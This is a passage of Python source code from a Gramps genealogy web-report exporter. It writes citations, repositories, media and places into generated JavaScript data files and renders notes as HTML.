the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - A list of the person index (in table 'I') referencing this citation\\n\"\n\t\t\t\"// (including the person events referencing this citation)\\n\"\n\t\t\t\"// - A list of the family index (in table 'F') referencing this citation\\n\"\n\t\t\t\"// (including the family events referencing this citation)\\n\"\n\t\t\t\"// - A list of the media index (in table 'M') referencing this citation\\n\"\n\t\t\t\"// (including the media references referencing this citation)\\n\"\n\t\t\t\"// - A list of the place index (in table 'P') referencing this citation\\n\"\n\t\t\t\"// (including the media references referencing this citation)\\n\"\n\t\t\t\"// - A list of the repository index (in table 'R') referencing this citation\\n\"\n\t\t\t\"C = [\")\n\t\tsep = \"\\n\"\n\t\tcitation_list = list(self.obj_dict[Citation])\n\t\tif (not self.inc_sources): citation_list = []\n\t\tcitation_list.sort(key = lambda x: self.obj_dict[Citation][x][OBJDICT_INDEX])\n\t\tfor citation_handle in citation_list:\n\t\t\tcitation = self.database.get_citation_from_handle(citation_handle)\n\t\t\tsource_handle = citation.get_reference_handle()\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Citation][citation_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\tsw.write(str(self.obj_dict[Source][source_handle][OBJDICT_INDEX])+ \",\\n\")\n\t\t\tsw.write(\"\\\"\")\n\t\t\tconfidence = citation.get_confidence_level()\n\t\t\tif ((confidence in conf_strings) and confidence != Citation.CONF_NORMAL):\n\t\t\t\tconfidence = _(conf_strings[confidence])\n\t\t\telse:\n\t\t\t\tconfidence = None\n\t\t\tfor (label, value) in [\n\t\t\t\t(_(\"Date\"), format_date(citation.get_date_object())),\n\t\t\t\t(_(\"Page\"), citation.get_page()),\n\t\t\t\t(_(\"Confidence\"), confidence),\n\t\t\t]:\n\t\t\t\tif value:\n\t\t\t\t\thtml = Html(\"p\") + Html(\"b\", label + \": \") + value\n\t\t\t\t\tsw.write(script_escape(html_text(html)))\n\t\t\tsw.write(\"\\\",\\n\")\n\t\t\t# Get citation notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(citation)) + \"\\\",\\n\")\n\t\t\t# Get citation media\n\t\t\tsw.write(self._data_media_reference_index(citation))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get references\n\t\t\tsw.write(self._data_bkref_index(Citation, citation_handle, Person))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_bkref_index(Citation, citation_handle, Family))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_bkref_index(Citation, citation_handle, MediaObject))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_bkref_index(Citation, citation_handle, Place))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_bkref_index(Citation, citation_handle, Repository))\n\t\t\tsw.write(\"\\n]\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_cita.js\", sw.getvalue())\n\n\n\tdef _export_repositories(self):\n\t\t\"\"\"\n\t\tExport repositories data in Javascript file\n\t\tThe repositories data is stored in the Javascript Array \"R\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'R' is sorted by repository name\\n\"\n\t\t\t\"// 'R' gives for each repository:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The repository name\\n\"\n\t\t\t\"// - The repository type\\n\"\n\t\t\t\"// - A list of addresses, with for each address:\\n\"\n\t\t\t\"// - The address date\\n\"\n\t\t\t\"// - The address date in ISO format (sortable)\\n\"\n\t\t\t\"// - The address place in the form:\\n\"\n\t\t\t\"// [street, locality, parish, city, state, county, zip, country]\\n\"\n\t\t\t\"// - The address notes\\n\"\n\t\t\t\"// - A list of the address source citations index (in table 'C')\\n\"\n\t\t\t\"// - The repository notes\\n\"\n\t\t\t\"// - The list of the repository URL in the form:\\n\"\n\t\t\t\"// [type, url, description]\\n\"\n\t\t\t\"// - A list of the sources referencing this repository, in the form:\\n\"\n\t\t\t\"// - source index (in table 'S')\\n\"\n\t\t\t\"// - media type\\n\"\n\t\t\t\"// - call number\\n\"\n\t\t\t\"// - notes of the repository reference\\n\"\n\t\t\t\"R = [\")\n\t\tsep = \"\\n\"\n\t\trepo_list = list(self.obj_dict[Repository])\n\t\tif (not self.inc_repositories): repo_list = []\n\t\trepo_list.sort(key = lambda x: self.obj_dict[Repository][x][OBJDICT_INDEX])\n\t\tfor repo_handle in repo_list:\n\t\t\trepo = self.database.get_repository_from_handle(repo_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Repository][repo_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\tname = repo.get_name() or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(name) + \"\\\",\\n\")\n\t\t\ttype = repo.get_type() or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(str(type)) + \"\\\",\\n\")\n\t\t\t# Addresses\n\t\t\tsw.write(\"[\\n\" + self._data_addresses(repo) + \"\\n],\\n\")\n\t\t\t# Get repository notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(repo)) + \"\\\",\\n\")\n\t\t\t# Get repository URL\n\t\t\tsw.write(self._data_url_list(repo))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get source references\n\t\t\tsw.write(self._data_repo_backref_index(repo, Source))\n\t\t\tsw.write(\"\\n]\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_repo.js\", sw.getvalue())\n\n\n\tdef _export_media(self):\n\t\t\"\"\"\n\t\tExport media data in Javascript file\n\t\tThe media data is stored in the Javascript Array \"M\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'M' is sorted by media title\\n\"\n\t\t\t\"// 'M' gives for each media object:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The media title\\n\"\n\t\t\t\"// - The media path in Gramps\\n\"\n\t\t\t\"// - The media path were the media is really located\\n\"\n\t\t\t\"// - The media MIME type\\n\"\n\t\t\t\"// - The media date\\n\"\n\t\t\t\"// - The media date in ISO format (sortable)\\n\"\n\t\t\t\"// - The media notes\\n\"\n\t\t\t\"// - A list of the media source citations index (in table 'C')\\n\"\n\t\t\t\"// - The list of the media attributes in the form:\\n\"\n\t\t\t\"// [attribute, value, note, list of citations]\\n\"\n\t\t\t\"// - Media thumbnail path\\n\"\n\t\t\t\"// - A list of the person referencing this media (including the person events referencing this media), in the form:\\n\"\n\t\t\t\"// - person index (in table 'I')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the family referencing this media (including the family events referencing this media), in the form:\\n\"\n\t\t\t\"// - family index (in table 'F')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the source referencing this media (including the source citations referencing this media), in the form:\\n\"\n\t\t\t\"// - source index (in table 'S')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the places referencing this media, in the form:\\n\"\n\t\t\t\"// - place index (in table 'P')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"M = [\")\n\t\tsep = \"\\n\"\n\t\tmedia_list = list(self.obj_dict[MediaObject])\n\t\tif (not self.inc_gallery): media_list = []\n\t\tmedia_list.sort(key = lambda x: self.obj_dict[MediaObject][x][OBJDICT_INDEX])\n\t\tfor media_handle in media_list:\n\t\t\tmedia = self.database.get_object_from_handle(media_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[MediaObject][media_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\ttitle = media.get_description() or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(html_escape(title)) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + script_escape(media.get_path()) + \"\\\",\\n\")\n\t\t\tpath = self.get_media_web_path(media)\n\t\t\tsw.write(\"\\\"\" + script_escape(path) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + script_escape(media.get_mime_type()) + \"\\\",\\n\")\n\t\t\t# Get media date\n\t\t\tdate = format_date(media.get_date_object()) or \"\"\n\t\t\tsw.write(\"\\\"\" + date + \"\\\",\\n\")\n\t\t\tdate = format_date(media.get_date_object(), True) or \"\"\n\t\t\tsw.write(\"\\\"\" + date + \"\\\",\\n\")\n\t\t\t# Get media notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(media)) + \"\\\",\\n\")\n\t\t\t# Get media sources\n\t\t\tsw.write(self._data_source_citation_index(media))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get media attributes\n\t\t\tsw.write(self._data_attributes(media))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get media thumbnail\n\t\t\tsw.write(\"\\\"\" + self.copy_thumbnail(media, (0,0,100,100)) + \"\\\",\\n\")\n\t\t\t# Get media references\n\t\t\tsw.write(self._data_media_backref_index(media, Person))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_media_backref_index(media, Family))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_media_backref_index(media, Source))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_media_backref_index(media, Place))\n\t\t\tsw.write(\"\\n\")\n\t\t\tsw.write(\"]\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_media.js\", sw.getvalue())\n\n\n\tdef _export_places(self):\n\t\t\"\"\"\n\t\tExport places data in Javascript file\n\t\tThe places data is stored in the Javascript Array \"P\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'P' is sorted by place name\\n\"\n\t\t\t\"// 'P' gives for each media object:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The place name\\n\"\n\t\t\t\"// - The place locations parts for the main and alternate names, in the form:\\n\"\n\t\t\t\"// (index 0 is main name, others are for alternate names)\\n\"\n\t\t\t\"// [street, locality, parish, city, state, county, zip, country]\\n\"\n\t\t\t\"// - The coordinates [latitude, longitude]\\n\\n\"\n\t\t\t\"// - The place notes\\n\"\n\t\t\t\"// - A list of the place source citations index (in table 'C')\\n\"\n\t\t\t\"// - The list of the place URL in the form:\\n\"\n\t\t\t\"// [type, url, description]\\n\"\n\t\t\t\"// - A list of the person index (in table 'I') for events referencing this place\\n\"\n\t\t\t\"// (including the persons directly referencing this place)\\n\"\n\t\t\t\"// - A list of the family index (in table 'F') for events referencing this place\\n\"\n\t\t\t\"P=[\")\n\t\tsep = \"\\n\"\n\t\tplace_list = list(self.obj_dict[Place])\n\t\tplace_list.sort(key = lambda x: self.obj_dict[Place][x][OBJDICT_INDEX])\n\t\tfor place_handle in place_list:\n\t\t\tplace = self.database.get_place_from_handle(place_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Place][place_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\tplace_name = report_utils.place_name(self.database, place_handle)\n\t\t\tsw.write(\"\\\"\" + script_escape(place_name) + \"\\\"\")\n\t\t\tif (not self.inc_places):\n\t\t\t\tsw.write(\"]\")\n\t\t\t\tsep = \",\\n\"\n\t\t\t\tcontinue\n\t\t\tsw.write(\",\\n\")\n\t\t\tlocations = []\n\t\t\tif (DWR_VERSION_410):\n\t\t\t\tml = get_main_location(self.database, place)\n\t\t\t\tloc = Location()\n\t\t\t\tloc.street = ml.get(PlaceType.STREET, '')\n\t\t\t\tloc.locality = ml.get(PlaceType.LOCALITY, '')\n\t\t\t\tloc.city = ml.get(PlaceType.CITY, '')\n\t\t\t\tloc.parish = ml.get(PlaceType.PARISH, '')\n\t\t\t\tloc.county = ml.get(PlaceType.COUNTY, '')\n\t\t\t\tloc.state = ml.get(PlaceType.STATE, '')\n\t\t\t\tloc.postal = place.get_code()\n\t\t\t\tloc.country = ml.get(PlaceType.COUNTRY, '')\n\t\t\t\tlocations.append(loc)\n\t\t\telse:\n\t\t\t\tif (place.main_loc):\n\t\t\t\t\tml = place.get_main_location()\n\t\t\t\t\tif (ml and not ml.is_empty()): locations.append(ml)\n\t\t\taltloc = place.get_alternate_locations()\n\t\t\tif (altloc):\n\t\t\t\taltloc = [nonempt for nonempt in altloc if (not nonempt.is_empty())]\n\t\t\t\tlocations += altloc\n\t\t\tloctabs = []\n\t\t\tfor loc in locations:\n\t\t\t\tloctab = [\n\t\t\t\t\tloc.street,\n\t\t\t\t\tloc.locality,\n\t\t\t\t\tloc.city,\n\t\t\t\t\tloc.parish,\n\t\t\t\t\tloc.county,\n\t\t\t\t\tloc.state,\n\t\t\t\t\tloc.postal,\n\t\t\t\t\tloc.country,\n\t\t\t\t]\n\t\t\t\tloctab = [(data or \"\") for data in loctab]\n\t\t\t\tloctab = [\"\\\"\" + script_escape(data) + \"\\\"\" for data in loctab]\n\t\t\t\tloctabs.append(\"[\" + \",\".join(loctab) + \"]\")\n\t\t\tsw.write(\"[\" + \",\".join(loctabs) + \"],\\n\")\n\t\t\tlatitude = place.get_latitude()\n\t\t\tlongitude = place.get_longitude()\n\t\t\tif (latitude and longitude):\n\t\t\t\tcoords = conv_lat_lon(latitude, longitude, \"D.D8\")\n\t\t\telse:\n\t\t\t\tcoords = (\"\", \"\")\n\t\t\tsw.write(\"[\\\"\" + \"\\\",\\\"\".join(coords) + \"\\\"]\\n,\")\n\t\t\t# Get place notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(place)) + \"\\\",\\n\")\n\t\t\t# Get place media\n\t\t\tsw.write(self._data_media_reference_index(place))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get place sources\n\t\t\tsw.write(self._data_source_citation_index(place))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get place URL\n\t\t\tsw.write(self._data_url_list(place))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get back references\n\t\t\tsw.write(self._data_bkref_index(Place, place_handle, Person))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_bkref_index(Place, place_handle, Family))\n\t\t\tsw.write(\"\\n]\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_place.js\", sw.getvalue())\n\n\n\tdef get_notes_text(self, object):\n\t\tif (not self.inc_notes): return(\"\")\n\t\tnotelist = object.get_note_list()\n\t\thtmllist = self.dump_notes(notelist)\n\t\tif (not htmllist): return(\"\")\n\t\treturn(html_text(htmllist))\n\n\n\tdef get_notes_attributes_text(self, notelist, attrlist):\n\t\tif (not self.inc_notes): return(\"\")\n\t\t# Get notes\n\t\thtmllist = self.dump_notes(notelist)\n\t\t# Get attributes\n\t\tfor attr in attrlist:\n\t\t\tif (not htmllist): htmllist = Html(\"div\")\n\t\t\thtmllist.extend(Html(\n\t\t\t\t\"p\", _(\"%(type)s: %(value)s\") % {\n\t\t\t\t'type': Html(\"b\", attr.get_type()),\n\t\t\t\t'value': attr.get_value()\n\t\t\t\t}\n\t\t\t))\n\t\t\t# Also output notes attached to the attributes\n\t\t\tnotelist2 = attr.get_note_list()\n\t\t\thtmlnotelist = self.dump_notes(notelist2)\n\t\t\tif (htmlnotelist): htmllist.extend(htmlnotelist)\n\t\tif (not htmllist): return(\"\")\n\t\treturn(html_text(htmllist))\n\n\n\tdef dump_notes(self, notelist):\n\t\t\"\"\"\n\t\tdump out of list of notes with very little elements of its own\n\n\t\t@param: notelist -- list of notes\n\t\t\"\"\"\n\t\tnotesection = None\n\t\tif (not notelist): return(notesection)\n\t\tif (not self.inc_notes): return(notesection)\n\t\tfor note_handle in notelist:\n\t\t\tif (not notesection): notesection = Html(\"div\")\n\t\t\tthis_note = self.database.get_note_from_handle(note_handle)\n\t\t\tif this_note is not None:\n\t\t\t\tif (self.print_notes_type):\n\t\t\t\t\tnotesection.extend(Html(\"i\", str(this_note.type), class_=\"NoteType\"))\n\t\t\t\tnotesection.extend(self.get_note_format(this_note))\n\t\treturn(notesection)\n\n\tdef get_note_format(self, note):\n\t\t\"\"\"\n\t\twill get the note from the database, and will return either the\n\t\tstyled text or plain note\n\t\t\"\"\"\n\t\ttext = \"\"\n\t\tif note is not None:\n\t\t\t# retrieve the body of the note\n\t\t\tnote_text = note.get()\n\t\t\t# styled notes\n\t\t\thtmlnotetext = self.styled_note(note.get_styledtext(),\n\t\t\t\t\t\t\t\t\t\t\tnote.get_format(), contains_html =\n\t\t\t\t\t\t\t\t\t\t\tnote.get_type() == NoteType.HTML_CODE)\n\t\t\ttext = htmlnotetext or Html(\"p\", note_text)\n\t\t# return text of the note to its callers\n\t\treturn(text)\n\n\tdef styled_note(self, styledtext, format, contains_html=False):\n\t\t\"\"\"\n\t\tstyledtext : assumed a StyledText object to write\n\t\tformat : = 0 : Flowed, = 1 : Preformatted\n\t\tstyle_name : name of the style to use for default presentation\n\t\t\"\"\"\n\t\ttext = str(styledtext)\n\n\t\tif (not text): return('')\n\n\t\ts_tags = styledtext.get_tags()\n\t\thtmllist = Html(\"div\", class_=\"grampsstylednote\")\n\t\tif contains_html:\n\t\t\tmarkuptext = self._backend.add_markup_from_styled(text,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t s_tags,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t split='\\n',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t escape=False)\n\t\t\thtmllist += markuptext\n\t\telse:\n\t\t\tmarkuptext = self._backend.add_markup_from_styled(text,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t s_tags,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t split='\\n')\n\t\t\tlinelist = []\n\t\t\tlinenb = 1\n\t\t\tsigcount = 0\n\t\t\tfor line in markuptext.split('\\n'):\n\t\t\t\t[line, sigcount] = process_spaces(line, format)\n\t\t\t\tif sigcount == 0:\n\t\t\t\t\t# The rendering of an empty paragraph '

    '\n\t\t\t\t\t# is undefined so we use a non-breaking space\n\t\t\t\t\tif linenb == 1:\n\t\t\t\t\t\tlinelist.append(' ')\n\t\t\t\t\thtmllist.extend(Html('p') + linelist)\n\t\t\t\t\tlinelist = []\n\t\t\t\t\tlinenb = 1\n\t\t\t\telse:\n\t\t\t\t\tif linenb > 1:\n\t\t\t\t\t\tlinelist[-1] += '
    '\n\t\t\t\t\tlinelist.append(line)\n\t\t\t\t\tlinenb += 1\n\t\t\tif linenb > 1:\n\t\t\t\thtmllist.extend(Html('p') + linelist)\n\t\t\t# if the last line was blank, then as well as outputting the previous para,\n\t\t\t# which we have just done,\n\t\t\t# we also output a new blank para\n\t\t\tif sigcount == 0:\n\t\t\t\tlinelist = [\" \"]\n\t\t\t\thtmllist.extend(Html('p') + linelist)\n\t\treturn(htmllist)\n\n\n\tdef _data_source_citation_index(self, object):\n\t\t\"\"\"\n\t\tExport sources citations indexes related to L{object}\n\t\tSee L{_data_source_citation_index_from_list}\n\t\t\"\"\"\n\t\tcitationlist = object.get_citation_list()\n\t\treturn(self._data_source_citation_index_from_list(citationlist))\n\n\tdef _data_source_citation_index_from_list(self, citationlist):\n\t\t\"\"\"\n\t\tList sources citations indexes of the L{citationlist} in a string representing a Javascript Array\n\t\t@return: citations indexes as a string representing a Javascript Array\n\t\t\"\"\"\n\t\tif (not self.inc_sources): return(\"[]\")\n\t\tif not citationlist: return(\"[]\")\n\t\tsep = \"\"\n\t\ttxt = \"[\"\n\t\tfor citation_handle in citationlist:\n\t\t\tif (not txt): txt = Html(\"div\")\n\t\t\tcitation = self.database.get_citation_from_handle(citation_handle)\n\t\t\tif (citation is not None and (citation_handle in self.obj_dict[Citation])):\n\t\t\t\tsource_handle = citation.get_reference_handle()\n\t\t\t\tsource = self.database.get_source_from_handle(source_handle)\n\t\t\t\tif (source is not None and (source_handle in self.obj_dict[Source])):\n\t\t\t\t\ttitle = source.get_title()\n\t\t\t\t\tif (not title): title = source.get_gramps_id()\n\t\t\t\t\ttxt += sep + str(self.obj_dict[Citation][citation_handle][OBJDICT_INDEX])\n\t\t\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef _data_repo_reference_index(self, object):\n\t\t\"\"\"\n\t\tBuild a list of the repositories references index, in the form given by L{_data_repo_ref}\n\t\t\"\"\"\n\t\tif (not self.inc_repositories): return(\"[]\")\n\t\trefs = object.get_reporef_list()\n\t\tif (not refs): return(\"[]\")\n\t\tsep = \"\\n\"\n\t\ttxt = \"[\"\n\t\tfor ref in refs:\n\t\t\trepo_handle = ref.get_reference_handle()\n\t\t\tif (repo_handle in self.obj_dict[Repository]):\n\t\t\t\ttxt += sep + \"\\t\" + self._data_repo_ref(ref, self.obj_dict[Repository][repo_handle][OBJDICT_INDEX])\n\t\t\t\tsep = \",\\n\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\tdef _data_repo_ref(self, ref, index):\n\t\t\"\"\"\n\t\tBuild a repository reference, in the form:\n\t\t - repository index (in table 'R')\n\t\t - media type\n\t\t - call number\n\t\t - notes of the repository reference\n\t\t\"\"\"\n\t\trepo_handle = ref.get_reference_handle()\n\t\trepo = self.database.get_repository_from_handle(repo_handle)\n\t\ttxt = \"[\"\n\t\ttxt += str(index) + \",\"\n\t\ttxt += \"\\\"\" + script_escape(str(ref.get_media_type())) + \"\\\",\"\n\t\ttxt += \"\\\"\" + script_escape(ref.get_call_number()) + \"\\\",\"\n\t\ttxt += \"\\\"\" + script_escape(self.get_notes_text(ref)) + \"\\\"\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef _data_media_reference_index(self, object):\n\t\t\"\"\"\n\t\tBuild a list of the media references index, in the form given by L{_data_media_ref}\n\t\t\"\"\"\n\t\tif (not self.inc_gallery): return(\"[]\")\n\t\trefs = object.get_media_list()\n\t\tif (not refs): return(\"[]\")\n\t\tsep = \"\\n\"\n\t\ttxt = \"[\"\n\t\tfor ref in refs:\n\t\t\tmedia_handle = ref.get_reference_handle()\n\t\t\tif (media_handle in self.obj_dict[MediaObject]):\n\t\t\t\ttxt += sep + \"\\t\" + self._data_media_ref(ref, self.obj_dict[MediaObject][media_handle][OBJDICT_INDEX])\n\t\t\t\tsep = \",\\n\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\tdef _data_media_ref(self, ref, index):\n\t\t\"\"\"\n\t\tBuild a media reference, in the form:\n\t\t - media index (in table 'M')\n\t\t - media thumbnail path\n\t\t - [x1, y1, x2, y2] of the media reference\n\t\t - notes of the media reference\n\t\t - list of the media reference source citations index (in table 'C')\n\t\t\"\"\"\n\t\tmedia_handle = ref.get_reference_handle()\n\t\tmedia = self.database.get_object_from_handle(media_handle)\n\t\ttxt = \"[\"\n\t\ttxt += str(index)\n\t\ttxt += \",\\\"\"\n\t\ttxt += self.copy_thumbnail(media, ref.get_rectangle())\n\t\ttxt += \"\\\",[\"\n\t\trect = ref.get_rectangle() or (0,0,100,100)\n\t\ttxt += \",\".join(str(x) for x in rect)\n\t\ttxt += \"],\"\n\t\tattrlist = ref.get_attribute_list()\n\t\ttxt += \"\\\"\" + script_escape(self.get_notes_attributes_text(ref.get_note_list(), attrlist)) + \"\\\",\"\n\t\tcitationlist = ref.get_citation_list()\n\t\tfor attr in attrlist: citationlist.extend(attr.get_citation_list())\n\t\t# BUG: it seems that attribute references are given by both ref.get_citation_list and attr.get_citation_list\n\t\ttxt += self._data_source_citation_index_from_list(citationlist)\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef get_media_web_path(self, media):\n\t\t\"\"\"\n\t\tReturn the path of the media from the web pages\n\t\tThis function could be called several times for the same media\n\t\tThis function copies the media to the web pages directories if necessary\n\t\t\"\"\"\n\t\tmedia_path = media.get_path()\n\t\tif (media_path):\n\t\t\tnorm_path = media_path_full(self.database, media_path)\n\t\t\tif (os.path.isfile(norm_path)):\n\t\t\t\tif (self.copy_media):\n\t\t\t\t\text = os.path.splitext(norm_path)[1]\n\t\t\t\t\tiname = str(media.get_handle()) + ext\n\t\t\t\t\tiname = iname.lower()\n\t\t\t\t\tif (iname not in self.images_copied):\n\t\t\t\t\t\tself.copy_file(norm_path, iname, \"image\")\n\t\t\t\t\t\tself.images_copied.add(iname)\n\t\t\t\t\tweb_path = \"image/\" + iname\n\t\t\t\telse:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tweb_path = os.path.relpath(norm_path, self.target_path)\n\t\t\t\t\t\tweb_path = web_path.replace(\"\\\\\", \"/\")\n\t\t\t\t\texcept:\n\t\t\t\t\t\tweb_path = urlparse.urljoin('file:', urllib.pathname2url(norm_path))\n\t\t\t\t\t\tlog.warning(_(\"Impossible to convert \\\"%(path)s\\\" to a relative path.\") % {\"path\": norm_path})\n\t\t\t\treturn(web_path)\n\t\tlog.warning(\"Warning: File not found \\\"%(path)s\\\"\" % {\"path\": str(media_path)})\n\t\treturn(media_path)\n\n\n\tdef copy_thumbnail(self, media, region = None):\n\t\t\"\"\"\n\t\tGiven a handle (and optional region) make (if needed) an\n\t\tup-to-date cache of a thumbnail, and call copy_file\n\t\tto copy the cached thumbnail to the website.\n\t\tReturn the new path to the image.\n\t\t\"\"\"\n\t\tif (region and region[0] == 0 and region[1] == 0 and region[2] == 100 and region[3] == 100):\n\t\t\tregion = None\n\t\thandle = media.get_handle()\n\t\ttname = handle + ((\"-%d,%d-%d,%d.png\" % region) if region else \".png\")\n\t\tif (media.get_mime_type()):\n\t\t\tfrom_path = get_thumbnail_path(\n\t\t\t\tmedia_path_full(self.database, media.get_path()),\n\t\t\t\tmedia.get_mime_type(),\n\t\t\t\tregion)\n\t\t\tif not os.path.isfile(from_path):\n\t\t\t\tfrom_path = os.path.join(IMAGE_DIR, \"document.png\")\n\t\telse:\n\t\t\tfrom_path = os.path.join(IMAGE_DIR, \"document.png\")\n\t\tif (tname not in self.thumbnail_created):\n\t\t\tself.copy_file(from_path, tname, \"thumb\")\n\t\t\tself.thumbnail_created.add(tname)\n\t\tweb_path = \"thumb/\" + tname\n\t\treturn(web_path)\n\n\n\tdef _data_attributes(self, object):\n\t\t\"\"\"\n\t\tBuild the list of the L{object} attributes as a Javascript string, in the form:\n\t\t [attribute, value, note, list of citations]\n\t\t\"\"\"\n\t\tattrlist = object.get_attribute_list()\n\t\ttxt = \"[\"\n\t\tsep = \"\"\n\t\tfor attr in attrlist:\n\t\t\ttxt += sep + \"[\"\n\t\t\ttxt += \"\\\"\" + script_escape(str(attr.get_type())) + \"\\\",\"\n\t\t\ttxt += \"\\\"\" + script_escape(str(attr.get_value())) + \"\\\",\"\n\t\t\t# Get attribute notes\n\t\t\ttxt += \"\\\"\" + script_escape(self.get_notes_text(attr)) + \"\\\",\"\n\t\t\t# Get attribute sources\n\t\t\ttxt += self._data_source_citation_index(attr)\n\t\t\ttxt += \"]\"\n\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\tdef _data_attributes_src(self, source):\n\t\t\"\"\"\n\t\tBuild the list of the L{source} sources attributes as a Javascript string, in the form:\n\t\t [attribute, value, \"\", []]\n\t\t\"\"\"\n\t\tattrlist = source.get_attribute_list()\n\t\ttxt = \"[\"\n\t\tsep = \"\"\n\t\tfor attr in attrlist:\n\t\t\ttxt += sep + \"[\"\n\t\t\ttxt += \"\\\"\" + script_escape(str(attr.get_type())) + \"\\\",\"\n\t\t\ttxt += \"\\\"\" + script_escape(str(attr.get_value())) + \"\\\",\"\n\t\t\t# There aren't any attribute notes\n\t\t\ttxt += \"\\\"\\\",\"\n\t\t\t# There aren't any attribute sources\n\t\t\ttxt += \"[]\"\n\t\t\ttxt += \"]\"\n\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\tdef _data_url_list(self, object):\n\t\t\"\"\"\n\t\tBuild the list of the L{object} URL as a Javascript string, in the form:\n\t\t [type, url, description]\n\t\t\"\"\"\n\t\turllist = object.get_url_list()\n\t\ttxt = \"[\"\n\t\tsep = \"\"\n\t\tfor url in urllist:\n\t\t\t_type = url.get_type()\n\t\t\turi = url.get_path()\n\t\t\tdescr = url.get_description()\n\t\t\t# Email address\n\t\t\tif _type == UrlType.EMAIL:\n\t\t\t\tif not uri.startswith(\"mailto:\"):\n\t\t\t\t\turi = \"mailto:%(email)s\" % { 'email' : uri }\n\t\t\t# Web Site address\n\t\t\telif _type == UrlType.WEB_HOME:\n\t\t\t\tif not (uri.startswith(\"http://\") or uri.startswith(\"https://\")):\n\t\t\t\t\turi = \"http://%(website)s\" % { 